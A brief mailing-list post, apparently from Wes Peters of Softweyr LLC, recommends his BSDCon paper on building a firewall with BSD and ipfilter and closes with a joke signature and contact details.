Also, be sure to get a copy of my paper for BSDCon explaining why my company decided to use BSD and ipfilter to build the firewall of the future on. (Sorry, it's not a corporate firewall and is not suited for your use.)

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
wes@softweyr.com http://softweyr.com/